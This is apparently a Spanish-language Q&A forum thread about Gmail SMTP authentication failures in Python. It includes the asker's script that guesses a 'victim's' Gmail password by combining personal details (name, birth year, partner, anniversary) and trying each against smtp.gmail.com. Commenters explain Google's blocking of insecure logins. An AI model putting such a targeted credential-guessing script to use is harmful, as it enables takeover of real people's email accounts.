# fallo de autentificación con smtplib en python

Tags: python, python-2.x, smtp

estoy haciendo un pequeño algoritmo de fuerza bruta (por diversión más que nada) para lo que creé un correo falso con una contraseña simple, cuando el algoritmo dio con la clave, este no pudo ingresar, marcando la contraseña como incorrecta, cuando entré a la cuenta de gmail vi que fue porque se había bloqueado el inicio de cesión porque era sospechoso "supongo que es porque el programa lo intentó muchas veces" pensé.

```
#-*-coding: utf-8 -*-
import smtplib
if __name__ == '__main__':
    data = []
    user = str(raw_input("introduce el correo electronico: "))
    name = str(raw_input("introduce el nombre de la victima: "))
    data.append(name)
    year = str(raw_input("introduce el año en el que nació {}:".format(name)))
    data.append(year)
    word = str(raw_input("introduce una palabra que {} use mucho:".format(name)))
    data.append(word)
    couple = str(raw_input("{} tiene pareja? Y/N ".format(name)))
    if couple == "y" or couple == "Y":
        couple2 = str(raw_input("introduce el nombre de su pareja: "))
        data.append(couple2)
        anniversary = str(raw_input("cuando es el aniversario de {} y {}?:".format(name, couple2)))
        data.append(anniversary)
        server = smtplib.SMTP('smtp.gmail.com:587')
        server.starttls()
        for passw in data:
            for passw2 in data:
                rpass = passw + passw2
                try:
                    server.login(user,rpass)
                except Exception as e:
                    print("{} no es la clave correcta".format(rpass))
                else:
                    print("{} es la clave de {}".format(rpass, user))
                    server.quit()
                    exit()
    server.quit()
```

pero horas después intenté crear un programa (en python también) el cual estaría almacenado en una raspberry py que tendría un cronjob que activara el programa cada que fueran las 7 de la tarde, el programa me mandaría un mensaje por correo electrónico notificando me que debo de regar mis plantas, pero también tuve problemas de autentificación, me aseguré de que la contraseña fuera la correcta y aún así no pude.

¿alguien sabe por qué se puede dar este error?

[image]

Comment: Google bloquea la conexión vía SMTP por ser considerada poco segura. Puedes configurar la cuenta para que las acepte: https://support.google.com/accounts/answer/6010255. Por cierto Google tiene su propia API que permite interactuar con Gmail desde Python: https://developers.google.com/gmail/api/quickstart/python.

Comment: En todo caso, si lees el mensaje de error, te dice que entres desde esa misma máquina a la URL que te dan, usando un navegador. Para google ese intento de conexión será más seguro (pues usará sus servidores OAuth). Quizás después de haberlo hecho así "confíe" en esa IP y le permita autenticación SMTP en posteriores intentos.

Comment: @abulafia 
lo bueno es que lo de las plantas está solucionado, por desgracia (o más bien fortuna) no se puede solucionar lo de la fuerza bruta